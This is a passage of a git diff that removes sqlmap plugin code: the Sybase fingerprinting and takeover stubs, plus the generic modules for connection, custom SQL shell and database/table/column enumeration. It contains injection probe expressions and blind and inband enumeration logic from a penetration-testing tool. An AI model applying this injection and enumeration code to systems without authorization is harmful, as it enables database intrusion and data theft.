- warnMsg = "on Sybase searching of databases is not implemented" - logger.warn(warnMsg) - - return [] - - def searchTable(self): - warnMsg = "on Sybase searching of tables is not implemented" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Sybase searching of columns is not implemented" - logger.warn(warnMsg) - - return [] - - def search(self): - warnMsg = "on Sybase search option is not available" - logger.warn(warnMsg) - - def getHostname(self): - warnMsg = "on Sybase it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py deleted file mode 100644 index 924c5f16..00000000 --- a/plugins/dbms/sybase/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Sybase it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on Sybase it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py deleted file mode 100644 index f5e8f23e..00000000 --- a/plugins/dbms/sybase/fingerprint.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import unArrayizeValue -from lib.core.data import conf 
-from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import SYBASE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.SYBASE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.SYBASE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): - setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - - infoMsg = "testing %s" % DBMS.SYBASE - logger.info(infoMsg) - - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("@@transtate=@@transtate") - - if result: - infoMsg = "confirming %s" % DBMS.SYBASE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("suser_id()=suser_id()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) - - return False - - 
setDbms(DBMS.SYBASE) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.SYBASE - logger.info(infoMsg) - - result = unArrayizeValue(inject.getValue("SUBSTRING(@@VERSION,1,1)")) - - if result and result.isdigit(): - Backend.setVersion(str(result)) - else: - for version in xrange(12, 16): - result = inject.checkBooleanExpression("PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version) - - if result: - Backend.setVersion(str(version)) - break - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) - - return False diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py deleted file mode 100644 index bbccdf91..00000000 --- a/plugins/dbms/sybase/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar' - """ - - def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "TO_UNICHAR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py deleted file mode 100644 index a57ee63e..00000000 --- a/plugins/dbms/sybase/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as 
GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Sybase it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Sybase it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Sybase it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Sybase it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/plugins/generic/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py deleted file mode 100644 index 3e717a00..00000000 --- a/plugins/generic/connector.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapUndefinedMethod - -class Connector: - """ - This class defines generic dbms protocol functionalities for plugins. 
- """ - - def __init__(self): - self.connector = None - self.cursor = None - - def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" - self.hostname = conf.hostname - self.port = conf.port - self.db = conf.dbmsDb - - def printConnected(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d established" % self.port - logger.info(infoMsg) - - def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) - - self.connector = None - self.cursor = None - - def initCursor(self): - self.cursor = self.connector.cursor() - - def close(self): - try: - if self.cursor: - self.cursor.close() - if self.connector: - self.connector.close() - except Exception, msg: - logger.debug(msg) - finally: - self.closed() - - def checkFileDb(self): - if not os.path.exists(self.db): - errMsg = "the provided database file '%s' does not exist" % self.db - raise SqlmapFilePathException(errMsg) - - def connect(self): - errMsg = "'connect' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def fetchall(self): - errMsg = "'fetchall' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def execute(self, query): - errMsg = "'execute' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) - - def select(self, query): - errMsg = "'select' method must be defined " - errMsg += "into the specific DBMS plugin" - raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py deleted file mode 100644 index 86825cea..00000000 --- a/plugins/generic/custom.py +++ /dev/null @@ -1,136 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for 
copying permission -""" - -import re -import sys - -from lib.core.common import Backend -from lib.core.common import dataToStdout -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import isStackingAvailable -from lib.core.data import conf -from lib.core.data import logger -from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import NULL -from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.shell import autoCompletion -from lib.request import inject - -class Custom: - """ - This class defines custom enumeration functionalities for plugins. - """ - - def __init__(self): - pass - - def sqlQuery(self, query): - output = None - sqlType = None - query = query.rstrip(';') - - try: - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break - - if not any(_ in query.upper() for _ in ("OPENROWSET", "INTO")) and (not sqlType or "SELECT" in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) - - output = inject.getValue(query, fromUser=True) - - return output - elif not isStackingAvailable() and not conf.direct: - warnMsg = "execution of custom SQL queries is only " - warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) - - return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) - else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) - - inject.goStacked(query) - - debugMsg = "done" - logger.debug(debugMsg) - - output = NULL - - except SqlmapNoneDataException, ex: - logger.warn(ex) - - return output - - def sqlShell(self): - infoMsg = "calling %s shell. 
To quit type " % Backend.getIdentifiedDbms() - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - autoCompletion(AUTOCOMPLETE_TYPE.SQL) - - while True: - query = None - - try: - query = raw_input("sql-shell> ") - query = getUnicode(query, encoding=sys.stdin.encoding) - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - break - - if not query: - continue - - if query.lower() in ("x", "q", "exit", "quit"): - break - - output = self.sqlQuery(query) - - if output and output != "Quit": - conf.dumper.query(query, output) - - elif not output: - pass - - elif output != "Quit": - dataToStdout("No output\n") - - def sqlFile(self): - infoMsg = "executing SQL statements from given file(s)" - logger.info(infoMsg) - - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() - - if not sfile: - continue - - snippet = getSQLSnippet(Backend.getDbms(), sfile) - - if snippet and all(query.strip().upper().startswith("SELECT") for query in filter(None, snippet.split(';' if ';' in snippet else '\n'))): - for query in filter(None, snippet.split(';' if ';' in snippet else '\n')): - query = query.strip() - if query: - conf.dumper.query(query, self.sqlQuery(query)) - else: - conf.dumper.query(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py deleted file mode 100644 index d35ff8b7..00000000 --- a/plugins/generic/databases.py +++ /dev/null @@ -1,840 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import flattenValue -from lib.core.common import getLimitRange -from lib.core.common import 
isInferenceAvailable -from lib.core.common import isListLike -from lib.core.common import isNoneValue -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import parseSqliteTableSchema -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import singleTimeWarnMessage -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.dicts import FIREBIRD_TYPES -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import DBMS -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists - -class Databases: - """ - This class defines databases' enumeration functionalities for plugins. 
- """ - - def __init__(self): - kb.data.currentDb = "" - kb.data.cachedDbs = [] - kb.data.cachedTables = {} - kb.data.cachedColumns = {} - kb.data.cachedCounts = {} - kb.data.dumpedTable = {} - - def getCurrentDb(self): - infoMsg = "fetching current database" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].current_db.query - - if not kb.data.currentDb: - kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) - - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): - warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() - warnMsg += "schema names for enumeration as the counterpart to database " - warnMsg += "names on other DBMSes" - singleTimeWarnMessage(warnMsg) - - return kb.data.currentDb - - def getDbs(self): - if len(kb.data.cachedDbs) > 0: - return kb.data.cachedDbs - - infoMsg = None - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - warnMsg = "information_schema not available, " - warnMsg += "back-end DBMS is MySQL < 5. 
database " - warnMsg += "names will be fetched from 'mysql' database" - logger.warn(warnMsg) - - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): - warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms() - warnMsg += "for enumeration as the counterpart to database " - warnMsg += "names on other DBMSes" - logger.warn(warnMsg) - - infoMsg = "fetching database (schema) names" - - else: - infoMsg = "fetching database names" - - if infoMsg: - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.inband.query2 - else: - query = rootQuery.inband.query - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - kb.data.cachedDbs = arrayizeValue(values) - - if not kb.data.cachedDbs and isInferenceAvailable() and not conf.direct: - infoMsg = "fetching number of databases" - logger.info(infoMsg) - - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.count2 - else: - query = rootQuery.blind.count - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(count): - errMsg = "unable to retrieve the number of databases" - logger.error(errMsg) - else: - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ") - elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - query = rootQuery.blind.query2 % index - else: - query = rootQuery.blind.query % index - db = unArrayizeValue(inject.getValue(query, 
union=False, error=False)) - - if db: - kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) - - if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = (False, True) - else: - blinds = (True,) - - for blind in blinds: - count = 0 - kb.data.cachedDbs = [] - while True: - query = rootQuery.inband.query2 % count - value = unArrayizeValue(inject.getValue(query, blind=blind)) - if not (value or "").strip(): - break - else: - kb.data.cachedDbs.append(value) - count += 1 - if kb.data.cachedDbs: - break - - if not kb.data.cachedDbs: - infoMsg = "falling back to current database" - logger.info(infoMsg) - self.getCurrentDb() - - if kb.data.currentDb: - kb.data.cachedDbs = [kb.data.currentDb] - else: - errMsg = "unable to retrieve the database names" - raise SqlmapNoneDataException(errMsg) - else: - kb.data.cachedDbs.sort() - - if kb.data.cachedDbs: - kb.data.cachedDbs = filter(None, list(set(flattenValue(kb.data.cachedDbs)))) - - return kb.data.cachedDbs - - def getTables(self, bruteForce=None): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if bruteForce is None: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) - bruteForce = True - - elif Backend.isDbms(DBMS.ACCESS): - try: - tables = self.getTables(False) - except SqlmapNoneDataException: - tables = None - - if not tables: - errMsg = "cannot retrieve table names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) - bruteForce = True - else: - return tables - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if conf.db: - dbs = conf.db.split(",") - 
else: - dbs = self.getDbs() - - dbs = [_ for _ in dbs if _ and _.strip()] - - for db in dbs: - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - if bruteForce: - resumeAvailable = False - - for db, table in kb.brute.tables: - if db == conf.db: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries: - for db, table in kb.brute.tables: - if db == conf.db: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [table] - else: - kb.data.cachedTables[conf.db].append(table) - - return kb.data.cachedTables - - message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return tableExists(paths.COMMON_TABLES) - - infoMsg = "fetching tables for database" - infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None - - if condition: - if not Backend.isDbms(DBMS.SQLITE): - query += " WHERE %s" % condition - - if conf.excludeSysDbs: - infoMsg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg) - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs) if db not in self.excludeDbsList) - else: - query += " IN (%s)" % ",".join("'%s'" % unsafeSQLIdentificatorNaming(db) for db in sorted(dbs)) - - 
if len(dbs) < 2 and ("%s," % condition) in query: - query = query.replace("%s," % condition, "", 1) - - values = inject.getValue(query, blind=False, time=False) - - if not isNoneValue(values): - values = filter(None, arrayizeValue(values)) - - if len(values) > 0 and not isListLike(values[0]): - values = [(dbs[0], _) for _ in values] - - for db, table in filterPairValues(values): - db = safeSQLIdentificatorNaming(db) - table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) - - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) - - if not kb.data.cachedTables and isInferenceAvailable() and not conf.direct: - for db in dbs: - if conf.excludeSysDbs and db in self.excludeDbsList: - infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - continue - - infoMsg = "fetching number of tables for " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.info(infoMsg) - - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.count - else: - query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) - - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if count == 0: - warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) - warnMsg += "appears to be empty" - logger.warn(warnMsg) - continue - - elif not isNumPosStrValue(count): - warnMsg = "unable to retrieve the number of " - warnMsg += "tables for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - continue - - tables = [] - - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, plusOne=plusOne) - - for index in indexRange: - if Backend.isDbms(DBMS.SYBASE): - query = rootQuery.blind.query % (db, (kb.data.cachedTables[-1] if kb.data.cachedTables else " ")) - elif 
Backend.getIdentifiedDbms() in (DBMS.MAXDB, DBMS.ACCESS): - query = rootQuery.blind.query % (kb.data.cachedTables[-1] if kb.data.cachedTables else " ") - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.blind.query % index - elif Backend.isDbms(DBMS.HSQLDB): - query = rootQuery.blind.query % (index, unsafeSQLIdentificatorNaming(db)) - else: - query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) - - table = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if not isNoneValue(table): - kb.hintValue = table - table = safeSQLIdentificatorNaming(table, True) - tables.append(table) - - if tables: - kb.data.cachedTables[db] = tables - else: - warnMsg = "unable to retrieve the table names " - warnMsg += "for database '%s'" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) - - if isNoneValue(kb.data.cachedTables): - kb.data.cachedTables.clear() - - if not kb.data.cachedTables: - errMsg = "unable to retrieve the table names for any database" - if bruteForce is None: - logger.error(errMsg) - return self.getTables(bruteForce=True) - elif not conf.search: - raise SqlmapNoneDataException(errMsg) - else: - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - if kb.data.cachedTables: - for db in kb.data.cachedTables.keys(): - kb.data.cachedTables[db] = list(set(kb.data.cachedTables[db])) - - return kb.data.cachedTables - - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. 
sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) columns" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - if not conf.db: - errMsg = "unable to retrieve the current " - errMsg += "database name" - raise SqlmapNoneDataException(errMsg) - - elif conf.db is not None: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.db = conf.db.upper() - - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.col: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.col = conf.col.upper() - - colList = conf.col.split(',') - else: - colList = [] - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - for col in colList: - colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - - colList = filter(None, colList) - - if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): - conf.tbl = conf.tbl.upper() - - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - if conf.db in kb.data.cachedTables: - tblList = kb.data.cachedTables[conf.db] - else: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - - tblList = list(tblList) - elif not conf.search: - errMsg = "unable to retrieve the tables " - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - else: - return kb.data.cachedColumns - - tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) - - if bruteForce is None: - if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - 
logger.error(errMsg) - bruteForce = True - - elif Backend.isDbms(DBMS.ACCESS): - errMsg = "cannot retrieve column names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) - bruteForce = True - - if bruteForce: - resumeAvailable = False - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries or colList: - columns = {} - - for column in colList: - columns[column] = None - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - columns[colName] = colType - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} - - return kb.data.cachedColumns - - message = "do you want to use common column existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return columnExists(paths.COMMON_COLUMNS) - - rootQuery = queries[Backend.getIdentifiedDbms()].columns - condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - infoMsg = "fetching columns " - condQuery = "" - - if len(colList) > 0: - if colTuple: - _, colCondParam = colTuple - infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - else: - colCondParam = "='%s'" - infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) - - condQueryStr = "%%s%s" % colCondParam - condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): - query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) - query += condQuery - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) - query += condQuery - elif Backend.isDbms(DBMS.MSSQL): - query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, - conf.db, 
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) - query += condQuery.replace("[DB]", conf.db) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): - query = rootQuery.inband.query % tbl - - if dumpMode and colList: - values = [(_,) for _ in colList] - else: - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - values = inject.getValue(query, blind=False, time=False) - - if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): - index, values = 1, [] - - while True: - query = rootQuery.inband.query2 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, blind=False, time=False)) - - if isNoneValue(value) or value == " ": - break - else: - values.append((value,)) - index += 1 - - if Backend.isDbms(DBMS.SQLITE): - parseSqliteTableSchema(unArrayizeValue(values)) - elif not isNoneValue(values): - table = {} - columns = {} - - for columnData in values: - if not isNoneValue(columnData): - name = safeSQLIdentificatorNaming(columnData[0]) - - if name: - if conf.getComments: - _ = queries[Backend.getIdentifiedDbms()].column_comment - if hasattr(_, "query"): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), 